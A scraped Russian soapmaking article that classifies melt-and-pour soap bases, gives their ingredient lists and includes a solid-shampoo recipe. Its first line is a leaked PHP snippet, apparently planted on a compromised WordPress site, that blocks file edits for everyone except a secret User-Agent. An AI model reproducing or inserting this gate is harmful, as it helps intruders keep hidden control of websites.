if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мыльная основа: подробная классификация видов и производителей | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мыльная основа: подробная классификация видов и производителей

Для того чтобы сделать мыло в домашних условиях потребуется самый основной ингредиент – мыльная основа. В специализированных магазинах этот материал представлен в самом разнообразном ассортименте

Для того что­бы сде­лать мыло в домаш­них усло­ви­ях потре­бу­ет­ся самый основ­ной ингре­ди­ент – мыль­ная осно­ва. В спе­ци­а­ли­зи­ро­ван­ных мага­зи­нах этот мате­ри­ал пред­став­лен в самом раз­но­об­раз­ном ассор­ти­мен­те. На то, что­бы начи­на­ю­щий мыло­вар мог хоть немно­го ори­ен­ти­ро­вать­ся, и направ­ле­на дан­ная статья.

Прозрачная основа без SLS (или «CrystalSLSFre»)

Про­из­во­ди­тель – Англия. SLSозна­ча­ет, что в мыль­ной осно­ве нет лау­рил суль­фа­та натрия. Она не име­ет цве­та, она оста­ет­ся про­зрач­ной даже при добав­ле­нии в осно­ву эфир­ных масел. Про­дукт отлич­но­го каче­ства – заме­ча­тель­но пенит­ся, пре­крас­но режет­ся на кус­ки, обла­да­ет хоро­ши­ми пла­стич­ны­ми свой­ства­ми. Это поз­во­ля­ет вклю­чить осно­ву в набор для мыло­ва­ре­ния для начинающих.
При добав­ле­нии диок­си­да тита­на сырье утра­тит про­зрач­ность, при­об­ре­тая ров­ный белый цвет.

Белая основа (или «CrystalWST»)

Сырье для изго­тов­ле­ния мыла в домаш­них усло­ви­ях. Име­ет непро­зрач­ную струк­ту­ру бело­го цве­та. Англий­ской про­из­во­ди­тель дав­но заре­ко­мен­до­вал себя на этом рын­ке ста­биль­ным каче­ством продукта.

Белая основа с козьим молоком (или «CrystalGoatsMilk»)

Исполь­зу­ет­ся для изго­тов­ле­ния цвет­но­го непро­зрач­но­го мыла сво­и­ми рука­ми для начи­на­ю­щих. Эта осно­ва англий­ско­го про­из­вод­ства может рас­сла­и­вать­ся, при этом боль­шая часть диок­си­да тита­на содер­жит­ся в верх­ней части. При нагре­ва­нии струк­ту­ра при­об­ре­та­ет одно­род­ность. Пока­за­тель pH тако­го мыла нахо­дит­ся в диа­па­зоне от 7,5 до 8,5.

Состав:
Вода 25% — 50%
Гли­це­рин 10% — 25%
Натрия сте­а­рат 10% — 25%
Сор­би­тол 10% — 25%
Лау­рат натрия 5 — 10%
Про­пи­лен­гли­коль 5 — 10%
Лау­рет­суль­фат натрия 5 — 10%
Козье моло­ко 5 ‑1 0%
Лау­рил­суль­фат натрия 1% — 5%
Хло­рид натрия 0,5–1,0%
Сте­а­ри­но­вая кис­ло­та 0,5–1,0%
Лау­ри­но­вая кис­ло­та 0,5–1,0%
Диок­сид тита­на 0,1–0,5%
Пен­та­на­трия пен­те­нат < 0,1%
Тет­ра­на­трия эти­дро­нат < 0,1%

Прозрачная основа с оливковым маслом (или «CrystalOV»)

Пред­на­зна­че­на для полу­че­ния про­зрач­но­го гли­це­ри­но­во­го мыла, про­из­ве­де­на с исполь­зо­ва­ни­ем олив­ко­во­го мас­ла, содер­жа­ние кото­ро­го состав­ля­ет око­ло 20% от всех масел, содер­жа­щих­ся в основе.
Мыло сво­и­ми рука­ми, с нуля про­из­ве­ден­ное из этой осно­вы обла­да­ет высо­ки­ми вспе­ни­ва­ю­щи­ми­ся и увлаж­ня­ю­щи­ми свой­ства­ми. Гли­це­рин в соста­ве поз­во­ля­ет давать при­ят­ные ощу­ще­ния на коже при мытье.
Сырье может дли­тель­но хра­нить­ся при любых усло­ви­ях, не меняя цвет. Кро­ме того, осно­ва име­ет обык­но­вен­ный, спо­кой­ный запах.

Состав:
Вода 25–50%
Гли­це­рин 10–25%
Сте­а­рат натрия 10–25%
Про­пи­лен­гли­коль 10–25%
Сор­би­тол 10–25%
Лау­рет суль­фат натрия 5 — 10%
Лау­рат натрия 5–10%
Оли­ват натрия 5–10%
Лау­рил суль­фат натрия 1–5%
Хло­рид натрия 0,5%-1,0%
Сте­а­ри­но­вая кис­ло­та 0,1%-0,5%
Лау­ри­но­вая кис­ло­та 0,1%-0,5%
Пен­та­на­трия пен­те­нат < 0,1%
Тет­ра­на­трия эти­дро­нат  < 0,1%

Органическая основа (или «CrystalORG»)

2_1

Осно­ва явля­ет­ся нату­раль­ным сырьем для того, что­бы сде­лать мыло в домаш­них усло­ви­ях. Англий­ский про­из­во­ди­тель пред­став­ля­ет про­дук­цию, вклю­ча­ю­щую в себя нату­раль­ное мыло и осно­ву из гли­це­ри­на. Такое сырье про­из­во­дит­ся из нату­раль­ных и эко­ло­ги­че­ски чистых про­дук­тов: коко­со­во­го и паль­мо­яд­ро­во­го масел. Сами мас­ла и рас­те­ния, из кото­рых они про­из­во­дят­ся, про­хо­дят тща­тель­ный кон­троль, исклю­ча­ю­щий исполь­зо­ва­ние хими­че­ских удоб­ре­ний для выра­щи­ва­ния рас­те­ний, исполь­зу­е­мых для выжим­ки масла.

Кон­троль ведет­ся и над про­цес­сом изго­тов­ле­ния самой мыль­ной осно­вы на пред­мет отсут­ствия хими­че­ских реак­ти­вов, исполь­зу­е­мых для отбе­ли­ва­ния. Это и объ­яс­ня­ет беже­вый цвет осно­вы, полу­ча­е­мый из-за вклю­ча­е­мых в него масел. Из тако­го сырья полу­ча­ет­ся вели­ко­леп­ное мыло сво­и­ми рука­ми, рецеп­ты кото­ро­го лег­ко найти.

Состав:
Гли­це­рин
Вода
Паль­мат натрия
Сорбитол
Коко­ат натрия
Децил глюкозид
Хло­рид натрия
Паль­мо­вая кислота
Коко­со­вая жир­ная кислота
Пен­та­на­трия пентенат
Тет­ра­на­трия этидронат

Основа для свирлов

2_2

Свирл – спе­ци­аль­ная тех­ни­ка рисун­ка на мыле. Она обла­да­ет рядом свойств, кото­рые пре­крас­но под­хо­дят даже для домаш­не­го мыло­ва­ре­ния в домаш­них условиях:
Это сырье в отли­чие от дру­гих видов поз­во­ля­ет созда­вать чет­кие рисун­ки на мыле. Это про­ис­хо­дит из-за того, что при нагре­ва­нии состав име­ет более густую кон­си­стен­цию. Вслед­ствие это­го наблю­да­ет­ся повы­шен­ное коли­че­ство пузырь­ков на поверх­но­сти. Одна­ко пери­од затвер­де­ва­ния у такой осно­вы длит­ся более дол­гое время.

Состав:
Вода
Про­пи­лен гликоль
Сте­а­рат натрия
Глицерин
Сахароза
Лау­рат натрия
Лау­рет­суль­фат натрия
Сорбитол
Лау­рил­суль­фат натрия
Кремний
Хло­рид натрия
Сте­а­ри­но­вая кислота
Лау­ри­но­вая кислота
Пен­та­на­трия пентенат
Тет­ра­на­трия этидронат
Метилхлороизотиазолин
Метилизотиазолин
Хло­рид маг­ния & нит­рат магния

Мягкая основа (или «CrystalOPC»)

Пред­став­ля­ет собой нов­ше­ство англий­ских про­из­во­ди­те­лей, пора­жа­ю­щая сво­ей неор­ди­нар­но­стью. Кон­си­стен­ция дан­но­го сырья нахо­дит­ся в про­ме­жу­точ­ном агре­гат­ном состо­я­нии меж­ду твер­дым и жид­ким. Это состо­я­ние, боль­ше напо­ми­на­ю­щее воз­душ­ный крем. Поэто­му такая осно­ва про­сто неза­ме­ни­ма, что­бы изго­то­вить мыло в домаш­них усло­ви­ях «кон­ди­тер­ской» темы.
Сырье обла­да­ет вели­ко­леп­ны­ми пеня­щи­ми­ся и увлаж­ня­ю­щи­ми свой­ства­ми и пре­крас­но под­хо­дит для при­го­тов­ле­ния мыла-скра­ба. Для сме­ши­ва­ния ингре­ди­ен­тов реко­мен­до­ва­но при­об­ре­сти так­же и спе­ци­аль­ную рам­ку для пере­ме­ши­ва­ния ком­по­нен­тов мыла и при­да­ния ей устой­чи­вой пены.

Состав:
Вода
Глицерин
Коко­ил изе­ти­о­нат натрия
Сорбитол
Дина­трия лау­рил сульфосукцинат
Хло­рид натрия
Феноксиэтанол
Тет­ра­на­трия ЕДТА

Основа Activ

2_3

Сырье рос­сий­ско­го про­из­вод­ства пред­став­ле­на в двух вари­ан­тах: про­зрач­ном и белом. Обла­да­ет хоро­ши­ми пеня­щи­ми­ся свой­ства­ми, а так­же высо­кой пла­стич­но­стью и дли­тель­ным пери­о­дом засты­ва­ния, что явля­ет­ся нема­ло­важ­ным свой­ством для того, что­бы варить мыло в домаш­них усло­ви­ях. При аро­ма­ти­за­ции мыла эфир­ны­ми мас­ла­ми необ­хо­ди­мо поме­ши­вать мас­су в тече­ние мину­ты без остановки.

Состав осно­вы SLS-free:
Вода
Пропиленгликоль
Бета­ин Коко­со­во­го масла
Лау­рил гликозид
Сте­а­рат натрия
Сорбитол
Лау­рет суль­фат натрия
Рас­ти­тель­ный глицерин
Лау­рат натрия
Паль­мо­вый стеарин
Эти­дро­но­вая кислота

Состав осно­вы SLS-free W
Вода
Пропиленгликоль
Бета­ин Коко­со­во­го масла
Сте­а­рат натрия
Лау­рет суль­фат натрия
Сорбитол
Рас­ти­тель­ный глицерин
Лау­рат натрия
Паль­мо­вый стеарин
Эти­дро­но­вая кислота
Диок­сид титана

Основа для производства твердого шампуня

Про­из­во­дит­ся из коко­суль­фа­та натрия и пред­став­ля­ет собой мел­кую белую струж­ку. Осно­ва обла­да­ет спе­ци­фи­че­ским запахом.

При исполь­зо­ва­нии это­го про­дук­та необ­хо­ди­мо соблю­дать меры предо­сто­рож­но­сти в свя­зи с тем, что он может вызвать раз­дра­же­ние. Поэто­му необ­хо­ди­мо про­ве­сти тест на чув­стви­тель­ность. Не сто­ит исполь­зо­вать гото­вый про­дукт из это­го сырья для детей, а при попа­да­нии пены в гла­за необ­хо­ди­мо их про­мыть боль­шим коли­че­ством воды.

В про­цес­се при­го­тов­ле­ния шам­пу­ня так­же сто­ит избе­гать попа­да­ния частиц в гла­за и дыха­тель­ные пути, поэто­му необ­хо­ди­мо всю про­це­ду­ру про­во­дить в очках и мар­ле­вой повяз­ке или респираторе.
Если при изго­тов­ле­нии мыла сво­и­ми рука­ми рецеп­ты  мож­но лег­ко най­ти в сети Интер­нет, то в каче­стве при­ме­ра при­ве­дем основ­ной рецепт для изго­тов­ле­ния твер­до­го шампуня.

Для частич­но­го раз­мяг­че­ния 80% коко­суль­фа­та натрия, его необ­хо­ди­мо нагреть на водя­ной бане. После чего мож­но доба­вить 10% масел, 8% воды, 2% эфир­ных масел для отдуш­ки. Хоро­шо пере­ме­шать и выло­жить в фор­му, тща­тель­но утрам­бо­вы­вая осно­ву. После того, как гото­вый шам­пунь про­ве­дет 1 час в моро­зиль­ной каме­ре, его необ­хо­ди­мо досу­шить при ком­нат­ной тем­пе­ра­ту­ре еще 2 или 3 дня.

Жидкие мыльные основы Crystal

2_4,

Осно­вы пред­на­зна­че­ны для изго­тов­ле­ния жид­ких мою­щих средств: шам­пу­ней, пен для ванн и тому подоб­ное. Этот кон­цен­трат пред­став­ля­ет собой щадя­щую смесь ПАВ с допол­ни­тель­ны­ми добав­ка­ми, кото­рые обес­пе­чи­ва­ют тугую пену и при­ят­ные для тела ощущения.

Это сырье, как и боль­шин­ство дру­гих мыль­ных основ не име­ет цве­та и обла­да­ет сла­бо выра­жен­ным запа­хом. Про­дук­ты пре­крас­но пенят­ся, а пена впо­след­ствии лег­ко смы­ва­ет­ся. Кро­ме того, пока­за­тель pHос­но­вы – ней­траль­ный, что поз­во­ля­ет экс­пе­ри­мен­ти­ро­вать с густо­той конеч­но­го продукта.

Для того что­бы сде­лать мыло в домаш­них усло­ви­ях из этой осно­вы необ­хо­ди­мо сме­шать все состав­ля­ю­щие и при необ­хо­ди­мо­сти мож­но загу­стить гото­вый про­дукт. Для это­го пре­крас­но под­хо­дит обыч­ная камен­ная соль.

При экс­пе­ри­мен­ти­ро­ва­нии луч­ше все­го делать проб­ные экзем­пля­ры в малень­ком коли­че­стве, что­бы более эко­ном­но исполь­зо­вать основу.

Состав: 

Наиме­но­ва­ние INCIНазна­че­ние% содер­жа­ния
ВодаВода (рас­тво­ри­тель)25% — 50%
Лау­рет суль­фат натрияОчи­ща­ю­щий и пено­об­ра­зу­ю­щий ПАВ25% — 50%
Про­пи­лен гликольУвлаж­ни­тель и регу­ля­тор вязкости1–5%
Хло­рид натрияРегу­ля­тор вязкости1–5%
Кока­мин оксидПАВ. Регу­ля­тор пено­об­ра­зо­ва­ния и кон­ди­ци­о­ни­ру­ю­щая добавка1–5%
Коко­ами­до­про­пил бетаинПАВ. Регу­ля­тор пено­об­ра­зо­ва­ния, смяг­ча­ю­щая добавка1–5%
Лимон­ная кислотаРегу­ля­тор рН0,1–1,0%
Тет­ра­на­трия ЭДТАХела­ти­ру­ю­щий агент0,1–1,0%
Поликватерниум‑7Кон­ди­ци­о­нер для волос и кожи0,1–1,0%
Нит­рат магния
Хло­рид магния
Метилхлороизотиазолинон
Метилизотиозолинон
Кон­сер­ви­ру­ю­щая система<0,1%

Основа для шампуня (или «ShampooBase»)

Может с лег­ко­стью слу­жить для про­из­вод­ства сер­ти­фи­ци­ро­ван­но­го шам­пу­ня, так как оно име­ет доку­мент соот­вет­ствия, выдан­ный Ассо­ци­а­ци­ей почв. Оно на более чем 70% состо­ит из при­род­ных и рас­ти­тель­ных состав­ля­ю­щих, в част­но­сти экс­тракт алое вера. Осно­ва не име­ет цве­та или име­ет свет­ло-жел­тый оттенок.

Это пол­но­стью под­го­тов­лен­ная осно­ва, име­ю­щая нуж­ной густо­ты кон­си­стен­цию. Поэто­му она иде­аль­но под­хо­дит для домаш­не­го мыло­ва­ре­ния для начи­на­ю­щих. Посколь­ку в нее надо толь­ко вклю­чить добав­ки эфир­ных масел, что­бы при­дать при­ят­ный и инди­ви­ду­аль­ный аро­мат шам­пу­ню. А для того, что­бы полу­чен­ный про­дукт под­хо­дил к нуж­но­му типу волос, надо лишь при­ме­нить спе­ци­аль­ные добавки.

Шам­пунь, изго­тов­лен­ный с помо­щью этой осно­вы, содер­жит мяг­кие поверх­ност­но-актив­ные веще­ства, что поз­во­ля­ет добить­ся шел­ко­ви­стой и неж­ной пены, что бла­го­при­ят­но вли­я­ет на так­тиль­ные ощущения.

Состав (в поряд­ке убы­ва­ния, INCI):
Вода
Деци­ло­вый гликозид
Лау­рил бета­инК­сан­та­но­вая смола
Алоэ Вера (поро­шок)
Феноксиэтанол
Лимон­ная кислота
Бен­зой­ная кислота
Дигид­ро­ук­сус­ная кислота

Основа для ополаскивателя для волос

Про­из­во­дит­ся в Англии и пред­став­ле­на в виде белой непро­зрач­ной эмуль­сии. Так­же как и осно­ва для шам­пу­ня может с лег­ко­стью исполь­зо­вать­ся в мыло­ва­ре­нии для начи­на­ю­щих из осно­вы. Это сырье более чем 70% состо­ит из рас­ти­тель­ных и орга­ни­че­ских ком­по­нен­тов, сре­ди кото­рых мож­но выде­лить олив­ко­вое и под­сол­неч­ное мас­ла, а так­же мас­ло Ши и Жожо­ба и экс­тракт Алоэ Вера, обла­да­ю­ще­го увлаж­ня­ю­щи­ми свой­ства­ми и экс­тракт бета­и­на сахар­ной свек­лы с его укреп­ля­ю­щи­ми свойствами.

Эта осно­ва изго­тов­ле­на из сер­ти­фи­ци­ро­ван­ных ком­по­нен­тов, на про­из­вод­ство кото­рых направ­ле­ны рас­те­ния, выра­щен­ные без син­те­ти­че­ских удоб­ре­ний. Сырье может слу­жить для про­из­вод­ства сер­ти­фи­ци­ро­ван­но­го про­дук­та, так как все его ингре­ди­ен­ты сер­ти­фи­ци­ро­ва­ны Ассо­ци­а­ци­ей почв. Кро­ме того, это уни­каль­ный про­дукт может исполь­зо­вать­ся в каче­стве сырья для мыла сво­и­ми рука­ми для начинающих.

По сво­им потре­би­тель­ским свой­ствам эта осно­ва не усту­па­ет мно­гим доро­гим мар­кам шам­пу­ня. Она под­хо­дит для всех типов волос и име­ет необ­хо­ди­мую кон­си­стен­цию (то есть ее не надо допол­ни­тель­но сгу­щать). По сво­ей тек­сту­ре она лег­кая и бархатистая.

Для при­да­ния уни­каль­но­го и непо­вто­ри­мо­го запа­ха при домаш­нем мыло­ва­ре­нии для начи­на­ю­щих необ­хо­ди­мо лишь доба­вить в осно­ву аро­ма­ти­че­ские эфир­ные мас­ла и отдушки.

Состав (в поряд­ке убы­ва­ния, NCI):
Вода
Цете­а­ри­ло­вый спирт
Бетаин
Коко-гликозид
Мас­ло Ши*
Олив­ко­вое масло*
Под­сол­неч­ное масло*
Коко­со­вое масло*
Мас­ло Жожоба*
Алоэ Вера (поро­шок)*
Ксан­та­но­вая смола
Феноксиэтанол
Лимон­ная кислота
Молоч­ная кислота
Бен­зой­ная кислота
Дегид­ро­ук­сус­ная кислота
* сер­ти­фи­ци­ро­ван­ные ингре­ди­ен­ты, выра­щен­ные без син­те­ти­че­ских удобрений

Кастильское мыло в жидкой форме

Про­из­ве­де­но в Англии и пред­став­ля­ет собой нату­раль­ное мыло, сва­рен­ное без при­ме­не­ния ПАВ. В его состав вхо­дит гли­це­рин, полу­чен­ный при омы­ле­нии в про­цес­се вар­ки под­сол­неч­но­го и коко­со­во­го масел.

Для того что­бы варить мыло в домаш­них усло­ви­ях из этой осно­вы, луч­ше все­го исполь­зо­вать нату­раль­ные ком­по­нен­ты. С осто­рож­но­стью надо отне­стись к сле­ду­ю­щим ком­по­нен­там: эфир­ные мас­ла эвка­лип­та, гвоз­ди­ки, лимо­на, а апель­си­но­вое мас­ло может вооб­ще всплыть на поверхность.

В свя­зи с этим в про­цес­се изго­тов­ле­ния мыла в домаш­них усло­ви­ях необ­хо­ди­мо при­дер­жи­вать­ся сле­ду­ю­щих про­стых правил:

  • экс­пе­ри­мен­ты луч­ше все­го про­во­дить в неболь­шом количестве;
  • добить­ся уве­ли­че­ния густо­ты про­дук­та мож­но с помо­щью про­стой камен­ной соли;
  • сле­ду­ет соблю­дать акку­рат­ность при раз­ме­ши­ва­нии ком­по­нен­тов буду­ще­го продукта;
  • для одно­род­но­сти изго­тав­ли­ва­е­мо­го мыла необ­хо­ди­мо соблю­дать иден­тич­ность тем­пе­ра­тур осно­вы и добав­ля­е­мых компонентов;
  • для про­вер­ки рас­сло­е­ния полу­чив­шей­ся мас­сы для мыла сво­и­ми рука­ми с нуля  необ­хо­ди­мо выдер­жать ее в тече­ние двух суток.

Состав:
Вода >50%
Оле­ат калия 10% – 25%
Кокат калия 5% — 10%
Гли­це­рин 1% — 5%
Цит­рат калия 0,1% — 0,5%
Палм кер­не­лат калия <0,1%
Паль­мо­ядер­ная кис­ло­та <0,1%

Жидкая суспензия

Пред­став­ле­на англий­ским про­из­во­ди­те­лем и обла­да­ет уни­каль­ной харак­тер­ной осо­бен­но­стью. Дело в том, что любые добав­ки, в том чис­ле и пузырь­ки воз­ду­ха в гото­вом про­дук­те будут рас­пре­де­ле­ны равномерно.

Для того что­бы при­го­то­вить мыло в домаш­них усло­ви­ях оста­нет­ся толь­ко доба­вить запах и под­кра­сить его кра­си­те­ля­ми, рас­тво­ри­мы­ми в воде. Одна­ко для этих целей луч­ше не исполь­зо­вать эфир­ные мас­ла, так как они при­да­дут мут­ность конеч­но­му изделию.

Состав:
Вода >50
Лау­рет суль­фат натрия 5 – 10
Коко­ами­до­про­пил бета­ин 1–5
Ксан­та­но­вая камедь 0,5–1,0
Фенок­си­эта­нол 0,1–0,5
Метил­па­ра­бен* >0,1
Про­пил­па­ра­бен* >0,1
Этил­па­ра­бен* >0,1
Бутил­па­ра­бен* >0,1
Изо­бу­тил­па­ра­бен* >0,1
Метил­хло­ро­изо­ти­о­зо­ли­нон** >0,1
Мети­ли­зо­ти­о­зо­ли­нон** >0,1
Хло­рид маг­ния >0,1
Нит­рат маг­ния >0,1

Основа для косметических средств

Про­из­вод­ство – Англия, состо­ит из 80% орга­ни­че­ских ком­по­нен­тов, сер­ти­фи­ци­ро­ван­ных Ассо­ци­а­ци­ей Почв. Успеш­но исполь­зу­ет­ся в домаш­нем мыло­ва­ре­нии для начи­на­ю­щих, так как сде­лать сво­и­ми рука­ми пену для при­ня­тии ванн или уни­каль­ный гель для душа не соста­вит осо­бо­го тру­да. Тем более что для изго­тов­ле­ния мож­но исполь­зо­вать эфир­ные аро­ма­ти­че­ские масла.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Voronixa

Все же люблю я мыловарение... Очень! За волшебство! Читайте все мои записи!